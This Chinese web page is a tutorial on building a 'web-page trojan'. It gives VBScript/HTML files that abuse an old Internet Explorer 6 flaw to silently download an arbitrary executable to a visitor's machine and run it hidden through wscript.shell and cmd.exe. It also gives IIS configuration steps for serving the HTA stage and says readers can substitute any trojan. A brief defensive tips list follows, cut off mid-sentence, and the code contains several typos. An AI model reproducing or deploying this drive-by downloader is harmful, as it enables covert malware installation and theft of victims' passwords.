主頁(yè) > 知識(shí)庫(kù) > 編寫(xiě)網(wǎng)頁(yè)木馬詳解

編寫(xiě)網(wǎng)頁(yè)木馬詳解
熱門標(biāo)簽:成都銷售外呼系統(tǒng)公司 電話機(jī)器人銷售公司嗎 鎮(zhèn)江云外呼系統(tǒng)怎么樣 vue 地圖標(biāo)注拖拽 電話機(jī)器人案例 保定電銷機(jī)器人軟件 土地證宗地圖標(biāo)注符號(hào) 客服外呼系統(tǒng)呼叫中心 自動(dòng)外呼系統(tǒng)怎么防止封卡
我們經(jīng)常聽(tīng)到這樣的忠告:“不要隨意下在不明的程序,不要隨意打開(kāi)郵件的附件...”這樣的忠告確實(shí)是有用的,不過(guò)我們的系統(tǒng)有不少漏洞,許多木馬已經(jīng)不需要客戶端和服務(wù)端了,他們利用這些系統(tǒng)漏洞按照被系統(tǒng)認(rèn)為合法的代碼執(zhí)行木馬的功能,有的木馬會(huì)在你完全不知道的情況下潛入,現(xiàn)在我來(lái)講解下通過(guò)IE6的漏洞實(shí)現(xiàn)訪問(wèn)網(wǎng)頁(yè)后神不知鬼不覺(jué)的下在并執(zhí)行指定程序的例子,也就是網(wǎng)頁(yè)木馬.



首先我們需要編寫(xiě)幾個(gè)簡(jiǎn)單的文件



一。名字為abc.abc的文件
html>

script language="vbscript">

Function HttpDoGet(url)

set oReq = CreateObject("Microsoft.XMLHTTP")

oReq.open "GET",url,false

oReq.send

If oReq.status=200 then

HttpDoGet=oReq.respomseBody

Savefile HttpDoGet,"c:win.exe"

End If

Set oReq=nothing

End Function

sub SaveFile(str.fName)

Set objStream = CreateObject("ADODB.Stream")

objStream.Type =1

objStream.Open

objStream.write str

objStream.SaveToFile fName.2

objStream.Close()

set objStream = nothing

exewin()

End sub

Sub exewin()

set wshshell=createobject ("wscript.shell" )

a=wshshell.run ("cmd.exe /c c:win.exe",0)

b=wshshell.run ("cmd.exe /c del c:win.hta",0)

window.close

End Sub

HttpDoGet "http://127.0.0.1/test.exe"

/script>

/html>



其中test.exe為木馬程序,實(shí)現(xiàn)必須放在WEB發(fā)布的目錄下,文件abc.abc也必須保存在發(fā)布的目錄下。



二。名字為test.htm的文件

html>body>

木馬運(yùn)行測(cè)試?。ㄟ@句話可以改成你想說(shuō)的)

object date="http://127.0.0.1/win.test";;;>/object>

/body>/html>



三。名字為win.test的文件

html>

body>

script language="vbscript">

Function HttpDoGet(url)

set oReq = CreateObject("Microsoft.XMLHTTP")

oReq.open "GET",url,false

oReq.send

If oReq.status=200 then

HttpDoGet,"c:win.hta"

Set oReq=nothing

End if

end function

sub SaveFile(str,fName)

Dim fso, tf

S e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject")

Set tf = fso.CreateTextfile(fName,True)

tf.Write str

tf.Close

exewin()

End sub

Sub exewin()

set wshshell=createobject ("wscript.shell" )

a=wshshell.run ("cmd.exe /c c:win.hat",0)

window.close

End Sub

HttpDoGet("http://127.0.0.1/abc.abc")

/script>

/body>

/html>


四。名字為test.exe的木馬程序。



...這個(gè)就不用我提供了吧,你想用什么木馬就把他的名字換成test.exe傳上去就可以了。



服務(wù)器的文件列表

test.htm:對(duì)外發(fā)布的網(wǎng)頁(yè)

win.test:下在文件abc.abc到對(duì)方機(jī)器上,并且保存為win.hta并且執(zhí)行。

abc.abc下載二進(jìn)制的木馬文件test.exe,并執(zhí)行。

test.exe:木馬程序。



上面所說(shuō)的文件可以修改成任意名字,只是不要忘記把源碼里的文件指向也修改就可以了!



最后是設(shè)置IIS,打開(kāi)“程序→管理工具→internet服務(wù)管理器”,右鍵單擊要設(shè)置的站點(diǎn),選擇《屬性》,在選擇“http頭”。單擊“MIME映射”里的“文件類型”按鈕,并在關(guān)聯(lián)擴(kuò)展名文本框中輸入“.hta”,在內(nèi)容類型(MIME)中輸入“application/hta",然后關(guān)閉所有窗口就可以了。



有許多朋友多遇見(jiàn)過(guò),說(shuō)什么贈(zèng)送Q號(hào)或者玩網(wǎng)游的時(shí)候里面有人喊贈(zèng)送好東東在XXX網(wǎng)址,其實(shí)那上面所說(shuō)的例子用的就是這種原理,不知不覺(jué)中你機(jī)器上的所有有關(guān)于密碼或者指定名詞的東西全發(fā)送到對(duì)方指定的郵件箱里去了



看完后是否覺(jué)得這種木馬太危險(xiǎn),甚至有種想把網(wǎng)線拔掉的感覺(jué)那?呵呵,其實(shí)了解了網(wǎng)頁(yè)木馬的工作原理后我們就不難防護(hù)他,看完以上內(nèi)容后就可以得出一個(gè)結(jié)論,網(wǎng)頁(yè)木馬主要利用IE的漏洞來(lái)實(shí)現(xiàn)的,所以在預(yù)防的時(shí)候一定要做到以下幾點(diǎn)就可以保證上網(wǎng)的安全了,

A。安裝IE的最新版本并且隨時(shí)下在才做系統(tǒng)和IE的補(bǔ)丁程序。

B。不隨便登陸不熟悉朋友送來(lái)的網(wǎng)站,對(duì)于熟悉的朋友也要小心哦。

C。不隨便登陸色情網(wǎng)站,還有一些賣

標(biāo)簽:內(nèi)江 重慶 麗江 公主嶺 臺(tái)灣 天津 成都 懷化

巨人網(wǎng)絡(luò)通訊聲明:本文標(biāo)題《編寫(xiě)網(wǎng)頁(yè)木馬詳解》,本文關(guān)鍵詞  編寫(xiě),網(wǎng)頁(yè),木馬,詳解,編寫(xiě),;如發(fā)現(xiàn)本文內(nèi)容存在版權(quán)問(wèn)題,煩請(qǐng)?zhí)峁┫嚓P(guān)信息告之我們,我們將及時(shí)溝通與處理。本站內(nèi)容系統(tǒng)采集于網(wǎng)絡(luò),涉及言論、版權(quán)與本站無(wú)關(guān)。
  • 相關(guān)文章
  • 下面列出與本文章《編寫(xiě)網(wǎng)頁(yè)木馬詳解》相關(guān)的同類信息!
  • 本頁(yè)收集關(guān)于編寫(xiě)網(wǎng)頁(yè)木馬詳解的相關(guān)信息資訊供網(wǎng)民參考!
    • 推薦文章